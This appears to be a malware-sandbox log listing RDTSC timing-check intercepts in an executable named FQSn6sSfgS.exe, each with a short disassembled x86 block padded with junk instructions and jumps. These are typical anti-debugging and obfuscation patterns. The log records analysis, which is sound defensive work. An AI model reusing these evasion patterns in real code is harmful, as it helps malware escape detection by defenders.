Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105198E second address: 105199E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB19901BDD6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105199E second address: 10519A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB19901BD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10519A8 second address: 10519AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1051C4F second address: 1051C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BD06h 0x0000000a popad 0x0000000b je 00007FB19901BD1Ah 0x00000011 jmp 00007FB19901BD14h 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007FB19901BD0Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1051D96 second address: 1051D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105209F second address: 10520BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FB19901BD06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BD0Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FFF18E second address: FFF192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FFF192 second address: FFF198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FFF198 second address: FFF1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FB19901BDDCh 0x0000000c jp 00007FB19901BDD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FFF1AA second address: FFF1B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1052847 second address: 1052857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1052857 second address: 105286A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB19901BD0Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105286A second address: 1052870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1052870 second address: 105288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB19901BD17h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105288E second address: 10528A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FB19901BDD6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FB19901BDD6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10209FE second address: 1020A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, ecx 0x0000000a jmp 00007FB19901BD0Eh 0x0000000f lea eax, dword ptr [ebp+12485796h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FB19901BD08h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f nop 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020A3E second address: 1020A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDDBh 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020A51 second address: 1020A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020A5D second address: 1020A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020A61 second address: 1020A6E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020C86 second address: 1020C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020C8A second address: 1020C94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020C94 second address: 1020C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020F02 second address: 1020F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB19901BD0Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1020F1E second address: E6EC3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB19901BDDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D2A05h] 0x00000011 push dword ptr [ebp+122D0C65h] 0x00000017 mov di, bx 0x0000001a push esi 0x0000001b mov ecx, dword ptr [ebp+122D2BE1h] 0x00000021 pop ecx 0x00000022 call dword ptr [ebp+122D2E34h] 0x00000028 pushad 0x00000029 stc 0x0000002a xor eax, eax 0x0000002c clc 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 pushad 0x00000032 je 00007FB19901BDD6h 0x00000038 mov dword ptr [ebp+122D2E76h], ecx 0x0000003e popad 0x0000003f mov dword ptr [ebp+122D2A51h], eax 0x00000045 jnl 00007FB19901BDD7h 0x0000004b mov esi, 0000003Ch 0x00000050 mov dword ptr [ebp+122D2E76h], edx 0x00000056 jng 00007FB19901BDD7h 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D2DE7h], edi 0x00000066 lodsw 0x00000068 cld 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d clc 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 pushad 0x00000073 mov eax, dword ptr [ebp+122D29A5h] 0x00000079 jmp 00007FB19901BDE5h 0x0000007e popad 0x0000007f nop 0x00000080 pushad 0x00000081 push edi 0x00000082 jmp 00007FB19901BDDEh 0x00000087 pop edi 0x00000088 push edi 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102112B second address: 1021137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021137 second address: 102113D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021A10 second address: 1021A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB19901BD06h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FB19901BD0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021A27 second address: 1021A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021A2B second address: 1021A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BD18h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021A48 second address: 1021AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FB19901BDD8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 call 00007FB19901BDE6h 0x00000027 pushad 0x00000028 jbe 00007FB19901BDD6h 0x0000002e or dword ptr [ebp+12461623h], edx 0x00000034 popad 0x00000035 pop ecx 0x00000036 push 0000001Eh 0x00000038 sbb edi, 2C56002Ah 0x0000003e nop 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007FB19901BDD6h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021AA6 second address: 1021AC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB19901BD08h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FB19901BD0Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021AC9 second address: 1021ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021BE5 second address: 1021BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021BE9 second address: 1021BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021BED second address: 1021BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021BF3 second address: 1021C09 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB19901BDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FB19901BDDEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1021E35 second address: FFF18E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB19901BD0Ch 0x00000008 jns 00007FB19901BD06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edi, 1E762349h 0x00000018 lea eax, dword ptr [ebp+124857DAh] 0x0000001e xor edi, dword ptr [ebp+122D2AC5h] 0x00000024 nop 0x00000025 push edi 0x00000026 push edi 0x00000027 pushad 0x00000028 popad 0x00000029 pop edi 0x0000002a pop edi 0x0000002b push eax 0x0000002c js 00007FB19901BD0Ah 0x00000032 push eax 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 pop eax 0x00000036 nop 0x00000037 mov edx, dword ptr [ebp+122D29EDh] 0x0000003d lea eax, dword ptr [ebp+12485796h] 0x00000043 jmp 00007FB19901BD0Eh 0x00000048 push eax 0x00000049 push esi 0x0000004a pushad 0x0000004b jmp 00007FB19901BD0Eh 0x00000050 pushad 0x00000051 popad 0x00000052 popad 0x00000053 pop esi 0x00000054 mov dword ptr [esp], eax 0x00000057 mov edi, dword ptr [ebp+1244F16Fh] 0x0000005d call dword ptr [ebp+122D1B0Bh] 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 push edi 0x00000068 pop edi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1061C46 second address: 1061C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1061C4A second address: 1061C90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB19901BD0Fh 0x00000008 pop esi 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007FB19901BD06h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jc 00007FB19901BD21h 0x0000001c jmp 00007FB19901BD0Eh 0x00000021 jmp 00007FB19901BD0Dh 0x00000026 push eax 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064EFA second address: 1064EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064EFE second address: 1064F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064F02 second address: 1064F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064F0B second address: 1064F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064AE2 second address: 1064AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064AED second address: 1064AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1064AF3 second address: 1064AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106923B second address: 1069240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1070315 second address: 1070319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1070319 second address: 107033B instructions: 0x00000000 rdtsc 0x00000002 je 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FB19901BD0Fh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107033B second address: 107034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 ja 00007FB19901BDD8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107034A second address: 1070363 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB19901BD13h 0x00000008 jmp 00007FB19901BD0Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1070363 second address: 1070367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106EB75 second address: 106EB7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106ECF8 second address: 106ECFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106ECFC second address: 106ED25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB19901BD14h 0x0000000d push ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jp 00007FB19901BD06h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F161 second address: 106F17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB19901BDE2h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F17D second address: 106F1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB19901BD06h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007FB19901BD0Ch 0x00000013 jnl 00007FB19901BD0Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F1A3 second address: 106F1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDDBh 0x00000009 jmp 00007FB19901BDE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F2F1 second address: 106F2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F2F7 second address: 106F2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102184C second address: 10218B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FB19901BD06h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and di, 6369h 0x00000014 mov ebx, dword ptr [ebp+124857D5h] 0x0000001a sub edx, 62F11C20h 0x00000020 add eax, ebx 0x00000022 and dl, FFFFFFF6h 0x00000025 push eax 0x00000026 jmp 00007FB19901BD10h 0x0000002b mov dword ptr [esp], eax 0x0000002e xor dword ptr [ebp+1244F41Ah], ebx 0x00000034 push 00000004h 0x00000036 mov dword ptr [ebp+12456A79h], edi 0x0000003c nop 0x0000003d jmp 00007FB19901BD0Dh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FB19901BD12h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10218B6 second address: 10218BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F436 second address: 106F451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB19901BD14h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F451 second address: 106F455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F455 second address: 106F45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F45B second address: 106F464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE2AF2 second address: FE2B14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB19901BD16h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE2B14 second address: FE2B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDDDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE2B26 second address: FE2B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BD06h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107290F second address: 1072913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1072A50 second address: 1072A68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB19901BD0Bh 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107B36C second address: 107B371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107B371 second address: 107B390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BD12h 0x00000008 jno 00007FB19901BD06h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107989B second address: 10798A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0B5 second address: 107A0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0B9 second address: 107A0CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB19901BDD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0CE second address: 107A0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A0D2 second address: 107A0D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A3CD second address: 107A40D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FB19901BD19h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FB19901BD14h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
